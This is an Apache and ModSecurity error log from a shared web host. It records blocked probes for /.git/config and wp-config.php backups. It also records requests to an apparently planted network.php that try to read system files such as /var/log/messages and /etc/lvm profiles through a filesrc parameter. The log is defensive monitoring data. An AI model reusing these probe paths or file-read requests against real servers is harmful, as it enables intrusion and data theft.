[Mon May 11 17:52:01.814354 2026] [security2:error] [pid 1416109:tid 1416134] [client 34.53.154.146:54832] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.git/config"] [unique_id "agH7IVV4kyjgo4bQBUhzzwAAAMQ"]
[Mon May 11 17:52:03.658191 2026] [security2:error] [pid 1416109:tid 1416134] [client 34.53.154.146:54832] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agH7IVV4kyjgo4bQBUhzzwAAAMQ"]
[Mon May 11 17:52:55.481015 2026] [security2:error] [pid 1424905:tid 1424913] [client 35.230.149.45:59918] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.classist.fr"] [uri "/.git/config"] [unique_id "agH7V4W8yzYoWG_eyCW18QAAAUU"]
[Mon May 11 17:52:55.482209 2026] [security2:error] [pid 1424905:tid 1424913] [client 35.230.149.45:59918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.classist.fr"] [uri "/.git/config"] [unique_id "agH7V4W8yzYoWG_eyCW18QAAAUU"]
[Mon May 11 17:52:55.482909 2026] [security2:error] [pid 1424905:tid 1424913] [client 35.230.149.45:59918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.classist.fr"] [uri "/.git/config"] [unique_id "agH7V4W8yzYoWG_eyCW18QAAAUU"]
[Mon May 11 17:52:57.241399 2026] [security2:error] [pid 1416109:tid 1416136] [client 34.165.115.211:45214] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bender.piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agH7WVV4kyjgo4bQBUh0QwAAAMY"]
[Mon May 11 17:52:57.241638 2026] [security2:error] [pid 1416109:tid 1416136] [client 34.165.115.211:45214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.bender.piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agH7WVV4kyjgo4bQBUh0QwAAAMY"]
[Mon May 11 17:52:57.242238 2026] [security2:error] [pid 1416109:tid 1416136] [client 34.165.115.211:45214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.bender.piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agH7WVV4kyjgo4bQBUh0QwAAAMY"]
[Mon May 11 17:52:59.580089 2026] [authz_core:error] [pid 1424905:tid 1424928] [client 110.249.201.97:61540] AH01630: client denied by server configuration: /home/piregwan/public_html/testmail/error_log
[Mon May 11 17:53:03.859390 2026] [security2:error] [pid 1412074:tid 1412081] [client 35.246.43.2:35816] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/.git/config"] [unique_id "agH7XzJnyuKVXoStDhbUygAAAEU"]
[Mon May 11 17:53:03.859630 2026] [security2:error] [pid 1412074:tid 1412081] [client 35.246.43.2:35816] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/.git/config"] [unique_id "agH7XzJnyuKVXoStDhbUygAAAEU"]
[Mon May 11 17:53:03.860150 2026] [security2:error] [pid 1412074:tid 1412081] [client 35.246.43.2:35816] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agH7XzJnyuKVXoStDhbUygAAAEU"]
[Mon May 11 17:53:14.545652 2026] [security2:error] [pid 1411055:tid 1411058] [client 216.73.216.110:47300] ModSecurity: Warning. Matched phrase ".profile" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .profile found within ARGS:filesrc: /etc/lvm/profile/command_profile_template.profile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agH7akWKUxpmnkK7zHyeEQAAAQE"]
[Mon May 11 17:53:14.553617 2026] [security2:error] [pid 1411055:tid 1411058] [client 216.73.216.110:47300] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agH7akWKUxpmnkK7zHyeEQAAAQE"]
[Mon May 11 17:53:14.611740 2026] [security2:error] [pid 1411055:tid 1411058] [client 216.73.216.110:47300] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH7akWKUxpmnkK7zHyeEQAAAQE"]
[Mon May 11 17:53:28.033786 2026] [authz_core:error] [pid 1411055:tid 1411077] [client 47.128.58.5:26396] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/rest-api/error_log
[Mon May 11 17:54:10.717594 2026] [security2:error] [pid 1411099:tid 1411110] [client 43.157.62.101:36586] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecf.com"] [uri "/"] [unique_id "agH7og-Qm4vhlWBPlMjZJgAAAAo"]
[Mon May 11 17:54:13.954054 2026] [security2:error] [pid 1411099:tid 1411116] [client 43.157.62.101:49098] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecf.com"] [uri "/"] [unique_id "agH7pQ-Qm4vhlWBPlMjZKQAAABA"], referer: http://castiglionecf.com
[Mon May 11 17:54:15.548206 2026] [security2:error] [pid 1424905:tid 1424922] [client 43.157.62.101:51168] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agH7p4W8yzYoWG_eyCW2VQAAAU4"], referer: https://castiglionecf.com/
[Mon May 11 17:54:31.067910 2026] [security2:error] [pid 1412074:tid 1412089] [client 85.208.96.210:16002] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.sorry"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.rentparadise.fr"] [uri "/wp-config.php.sorry"] [unique_id "agH7tzJnyuKVXoStDhbVbgAAAE0"]
[Mon May 11 17:54:31.068261 2026] [security2:error] [pid 1412074:tid 1412089] [client 85.208.96.210:16002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.rentparadise.fr"] [uri "/wp-config.php.sorry"] [unique_id "agH7tzJnyuKVXoStDhbVbgAAAE0"]
[Mon May 11 17:54:31.246188 2026] [security2:error] [pid 1416109:tid 1416138] [client 43.155.140.157:52504] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/"] [unique_id "agH7t1V4kyjgo4bQBUh0zwAAAMg"]
[Mon May 11 17:54:33.353013 2026] [security2:error] [pid 1412074:tid 1412089] [client 85.208.96.210:16002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.rentparadise.fr"] [uri "/index.php"] [unique_id "agH7tzJnyuKVXoStDhbVbgAAAE0"]
[Mon May 11 17:54:34.556169 2026] [security2:error] [pid 1416109:tid 1416137] [client 185.191.171.1:53850] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.sorry"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/wp-config.php.sorry"] [unique_id "agH7ulV4kyjgo4bQBUh06QAAAMc"]
[Mon May 11 17:54:34.556409 2026] [security2:error] [pid 1416109:tid 1416137] [client 185.191.171.1:53850] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-config.php.sorry"] [unique_id "agH7ulV4kyjgo4bQBUh06QAAAMc"]
[Mon May 11 17:54:35.819540 2026] [security2:error] [pid 1416109:tid 1416137] [client 185.191.171.1:53850] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agH7ulV4kyjgo4bQBUh06QAAAMc"]
[Mon May 11 17:54:36.541263 2026] [security2:error] [pid 1411201:tid 1411264] [client 43.155.140.157:34992] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/"] [unique_id "agH7vPy_GXSWIKeli0sUQAAAAJI"], referer: http://rixonephotography.com
[Mon May 11 17:54:42.629775 2026] [:error] [pid 1412074:tid 1412097] [client 94.102.49.148:39756] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:56:10.774864 2026] [security2:error] [pid 1411201:tid 1411267] [client 216.73.216.110:48716] ModSecurity: Warning. Matched phrase ".profile" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .profile found within ARGS:filesrc: /etc/lvm/profile/cache-mq.profile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agH8Gvy_GXSWIKeli0sU8wAAAJY"]
[Mon May 11 17:56:10.775838 2026] [security2:error] [pid 1411201:tid 1411267] [client 216.73.216.110:48716] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agH8Gvy_GXSWIKeli0sU8wAAAJY"]
[Mon May 11 17:56:10.868044 2026] [security2:error] [pid 1411201:tid 1411267] [client 216.73.216.110:48716] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH8Gvy_GXSWIKeli0sU8wAAAJY"]
[Mon May 11 17:56:26.481559 2026] [:error] [pid 1412074:tid 1412087] [client 152.232.160.174:54976] File does not exist: /home/piregwan/public_html/wp-login.php, referer: https://www.piregwan-genesis.com
[Mon May 11 17:56:26.617866 2026] [ssl:error] [pid 1411055:tid 1411058] (EAI 2)Name or service not known: [client 74.7.175.189:34988] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:56:26.618116 2026] [ssl:error] [pid 1411055:tid 1411058] AH01941: stapling_renew_response: responder error
[Mon May 11 17:56:27.062326 2026] [:error] [pid 1424905:tid 1424926] [client 152.232.160.174:45277] File does not exist: /home/piregwan/public_html/wp-login.php, referer: https://www.piregwan-genesis.com/wp-login.php
[Mon May 11 17:56:38.077302 2026] [security2:error] [pid 1411201:tid 1411256] [client 216.73.216.110:58402] ModSecurity: Warning. Matched phrase ".profile" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .profile found within ARGS:filesrc: /etc/lvm/profile/vdo-small.profile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agH8Nvy_GXSWIKeli0sVIQAAAIo"]
[Mon May 11 17:56:38.078733 2026] [security2:error] [pid 1411201:tid 1411256] [client 216.73.216.110:58402] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agH8Nvy_GXSWIKeli0sVIQAAAIo"]
[Mon May 11 17:56:38.167139 2026] [security2:error] [pid 1411201:tid 1411256] [client 216.73.216.110:58402] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH8Nvy_GXSWIKeli0sVIQAAAIo"]
[Mon May 11 17:56:47.630209 2026] [core:error] [pid 1424905:tid 1424930] [client 104.152.52.58:39213] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:56:47.630246 2026] [core:error] [pid 1424905:tid 1424930] [client 104.152.52.58:39213] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:58:37.253456 2026] [:error] [pid 1411201:tid 1411263] [client 47.128.121.40:37072] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:58:50.786296 2026] [security2:error] [pid 1412074:tid 1412084] [client 216.73.216.110:10706] ModSecurity: Warning. Matched phrase "var/log/messages" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/messages found within ARGS:filesrc: /var/log/messages-20260510"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agH8ujJnyuKVXoStDhbWwAAAAEg"]
[Mon May 11 17:58:50.786924 2026] [security2:error] [pid 1412074:tid 1412084] [client 216.73.216.110:10706] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agH8ujJnyuKVXoStDhbWwAAAAEg"]
[Mon May 11 17:58:50.875464 2026] [security2:error] [pid 1412074:tid 1412084] [client 216.73.216.110:10706] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH8ujJnyuKVXoStDhbWwAAAAEg"]
[Mon May 11 17:59:47.685248 2026] [security2:error] [pid 1411055:tid 1411065] [client 43.135.145.77:51112] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "manhattan-studio.fr"] [uri "/"] [unique_id "agH880WKUxpmnkK7zHyf9gAAAQg"], referer: http://manhattan-studio.fr
[Mon May 11 17:59:48.530342 2026] [:error] [pid 1411201:tid 1411252] [client 182.96.164.107:62426] File does not exist: /home/pweilcom/public_html/images/7.php, referer: http://www.pweil.com/images/7.php
[Mon May 11 17:59:48.592570 2026] [:error] [pid 1412074:tid 1412090] [client 111.76.42.200:62438] File does not exist: /home/pweilcom/public_html/images/login8.php, referer: http://www.pweil.com/images/login8.php
[Mon May 11 17:59:48.637827 2026] [:error] [pid 1412074:tid 1412076] [client 182.96.164.141:62436] File does not exist: /home/pweilcom/public_html/images/1234.php, referer: http://www.pweil.com/images/1234.php
[Mon May 11 17:59:48.676504 2026] [:error] [pid 1416109:tid 1416154] [client 182.96.164.50:62445] File does not exist: /home/pweilcom/public_html/images/11.php, referer: http://www.pweil.com/images/11.php
